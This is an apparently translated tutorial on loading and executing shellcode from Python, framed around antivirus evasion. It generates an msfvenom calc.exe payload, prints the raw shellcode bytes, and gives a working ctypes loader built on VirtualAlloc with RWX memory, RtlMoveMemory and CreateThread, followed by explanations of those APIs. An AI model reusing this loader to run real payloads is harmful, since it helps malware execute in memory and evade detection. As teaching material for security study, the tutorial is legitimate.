What are the loading and execution methods of python anti-virus technology shellcode?

WBOY
Release: 2023-05-10 08:34:17
forward
1478 people have browsed it

0x01 Generate shellcode

First generate a shellcode through the following command, use the msfvenom -p option to specify paylaod, here select the parameters received by the windows/x64 and exec modules. Use calc.exe to pop up the calculator. The -f option is used to execute the compiled language of the generated shellcdoe.

msfvenom -p windows/x64/exec CMD='calc.exe' -f py
Copy after login

What are the loading and execution methods of python anti-virus technology shellcode?

0x02 Program to load and execute shellcode

The program is:

# -*- coding:utf-8 -*-

import ctypes
from ctypes import *
from ctypes.wintypes import *
import sys

PAGE_EXECUTE_READWRITE = 0x00000040
MEM_COMMIT = 0x3000
PROCESS_ALL_ACCESS = (0x000F0000 | 0x00100000 | 0xFFF)

VirtualAlloc = windll.kernel32.VirtualAlloc
RtlMoveMemory = windll.kernel32.RtlMoveMemory
CreateThread = windll.kernel32.CreateThread
WaitForSingleObject = windll.kernel32.WaitForSingleObject
OpenProcess = windll.kernel32.OpenProcess
VirtualAllocEx = windll.kernel32.VirtualAllocEx
WriteProcessMemory = windll.kernel32.WriteProcessMemory
CreateRemoteThread = windll.kernel32.CreateRemoteThread

shellcode = bytearray(
    b"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41"
    b"\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48"
    b"\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f"
    b"\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c"
    b"\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52"
    b"\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x8b"
    b"\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0"
    b"\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56"
    b"\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9"
    b"\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0"
    b"\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58"
    b"\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44"
    b"\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0"
    b"\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a"
    b"\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
    b"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00"
    b"\x00\x00\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41"
    b"\xba\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41"
    b"\xba\xa6\x95\xbd\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06"
    b"\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a"
    b"\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c\x63\x2e\x65"
    b"\x78\x65\x00"
)

def run1():
    VirtualAlloc.restype = ctypes.c_void_p  #重载函数返回类型为void
    p = VirtualAlloc(c_int(0),c_int(len(shellcode)),MEM_COMMIT,PAGE_EXECUTE_READWRITE)#申请内存
    buf = (c_char * len(shellcode)).from_buffer(shellcode)#将shellcdoe指向指针
    RtlMoveMemory(c_void_p(p),buf,c_int(len(shellcode)))#复制shellcdoe到申请的内存中
    h = CreateThread(c_int(0),c_int(0),c_void_p(p),c_int(0),c_int(0),pointer(c_int(0))) #执行创建线程
    WaitForSingleObject(c_int(h),c_int(-1))#检测线程创建事件

if __name__ == "__main__":
    run1()
Copy after login

0x03 Program explanation

Import module , and the memory allocated by the program can also be read and written.

import ctypes
from ctypes import *
from ctypes.wintypes import *
import sys

PAGE_EXECUTE_READWRITE = 0x00000040
MEM_COMMIT = 0x3000
PROCESS_ALL_ACCESS = (0x000F0000 | 0x00100000 | 0xFFF)
Copy after login

Region executable code, readable and writable

PAGE_EXECUTE_READWRITE = 0x00000040
Copy after login

Allocate memory

MEM_COMMIT = 0x3000
Copy after login

Give the process all permissions

PROCESS_ALL_ACCESS = (0x000F0000 | 0x00100000 | 0xFFF)
Copy after login

Call windows api

VirtualAlloc = windll.kernel32.VirtualAlloc
RtlMoveMemory = windll.kernel32.RtlMoveMemory
CreateThread = windll.kernel32.CreateThread
WaitForSingleObject = windll.kernel32.WaitForSingleObject
OpenProcess = windll.kernel32.OpenProcess
VirtualAllocEx = windll.kernel32.VirtualAllocEx
WriteProcessMemory = windll.kernel32.WriteProcessMemory
CreateRemoteThread = windll.kernel32.CreateRemoteThread
Copy after login

Assign the previously generated shellcode to the shellcode parameter, and use the bytearray function to process it before assigning

shellcode = bytearray(
    b"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41"
    b"\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48"
    b"\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f"
    b"\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c"
    b"\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52"
    b"\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x8b"
    b"\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0"
    b"\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56"
    b"\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9"
    b"\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0"
    b"\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58"
    b"\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44"
    b"\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0"
    b"\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a"
    b"\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
    b"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00"
    b"\x00\x00\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41"
    b"\xba\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41"
    b"\xba\xa6\x95\xbd\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06"
    b"\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a"
    b"\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c\x63\x2e\x65"
    b"\x78\x65\x00"
)
Copy after login

Create a method and call it, apply for memory, point the shellcode to the allocated memory pointer, and then copy the shellcode to the memory. Create a thread event and execute:

def run1():
    VirtualAlloc.restype = ctypes.c_void_p  #重载函数返回类型为void
    p = VirtualAlloc(c_int(0),c_int(len(shellcode)),MEM_COMMIT,PAGE_EXECUTE_READWRITE)#申请内存
    buf = (c_char * len(shellcode)).from_buffer(shellcode)#将shellcdoe指向指针
    RtlMoveMemory(c_void_p(p),buf,c_int(len(shellcode)))#复制shellcdoe到申请的内存中
    h = CreateThread(c_int(0),c_int(0),c_void_p(p),c_int(0),c_int(0),pointer(c_int(0))) #执行创建线程
    WaitForSingleObject(c_int(h),c_int(-1))#检测线程创建事件
Copy after login

VirtualAlloc is used to apply for memory space. It is a Windows API function. Its declaration is:

LPVOID VirtualAlloc{
LPVOID lpAddress, // 要分配的内存区域的地址
DWORD dwSize, // 分配的大小
DWORD flAllocationType, // 分配的类型
DWORD flProtect // 该内存的初始保护属性
};
Copy after login

RtlMoveMemory copies memory from the specified memory to another memory. Here. The syntax is:

VOID RtlMoveMemory(
VOID UNALIGNED *Destination,
const VOID UNALIGNED *Source,
SIZE_T Length
);
Copy after login

Parameters:

Destination: Pointer to the moving destination address.
Source: Pointer to the memory address to be copied.
Length: Specifies the number of bytes to copy.

CreateThread is a function provided by Microsoft in the Windows API to create a new thread. This function creates a new thread based on the main thread.
Function prototype:

HANDLE CreateThread(
LPSECURITY_ATTRIBUTES lpThreadAttributes,//SD
SIZE_T dwStackSize,//initialstacksize
LPTHREAD_START_ROUTINE lpStartAddress,//threadfunction
LPVOID lpParameter,//threadargument
DWORD dwCreationFlags,//creationoption
LPDWORD lpThreadId//threadidentifier
)
Copy after login

Parameter meaning

  • lpThreadAttributes: Pointer to a structure of SECURITY_ATTRIBUTES type. This parameter is ignored in Windows 98. In Windows NT, NULL uses default security and cannot be inherited by child threads. Otherwise, a structure needs to be defined to initialize its bInheritHandle member to TRUE.

  • dwStackSize, set the initial stack size in bytes. If it is 0, the same stack space size as the thread that calls the function will be used by default. In any case, Windows dynamically extends the stack size as needed.

  • lpStartAddress, pointer to the thread function, form: @function name, there is no limit on the function name

  • lpParameter: parameter passed to the thread function , is a pointer to a structure, and is NULL when no parameters need to be passed.

  • dwCreationFlags: Thread flags, possible values ​​are as follows

    • (1) CREATE_SUSPENDED (0x00000004): Create a suspended thread ,

    • (2) 0: Indicates activation immediately after creation.

    • (3) STACK_SIZE_PARAM_IS_A_RESERVATION (0x00010000): The dwStackSize parameter specifies the initial reserved stack size, otherwise, dwStackSize specifies the submitted size. This tag value is not supported on Windows 2000/NT and Windows Me/98/95.

  • lpThreadId: Save the id of the new thread.

    • WaitForSingleObject is a Windows API function. When the handle is closed while the wait is still pending, the function behavior is undefined. The handle must have SYNCHRONIZE access.

Declaration:

DWORD WINAPI WaitForSingleObject(
__in HANDLE hHandle,
__in DWORD dwMilliseconds
);
Copy after login

hHandle[in] Object handle. You can specify a series of objects, such as Event, Job, Memory resource notification, Mutex, Process, Semaphore, Thread, Waitable timer, etc.

dwMilliseconds[in] Timing time interval, unit is milliseconds (milliseconds). If you specify a non-zero value, the function is in a waiting state until the object marked by hHandle is triggered, or the time expires. If dwMilliseconds is 0, the object is not signaled, the function does not enter a wait state, it always returns immediately. If dwMilliseconds is INFINITE, the function will not return until the object is triggered.

Running the program can successfully pop up the calculator.

What are the loading and execution methods of python anti-virus technology shellcode?

The above is the detailed content of What are the loading and execution methods of python anti-virus technology shellcode?. For more information, please follow other related articles on the PHP Chinese website!

Related labels:
source:yisu.com
Statement of this Website
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn
Popular Tutorials
More>
Latest Downloads
More>
Web Effects
Website Source Code
Website Materials
Front End Template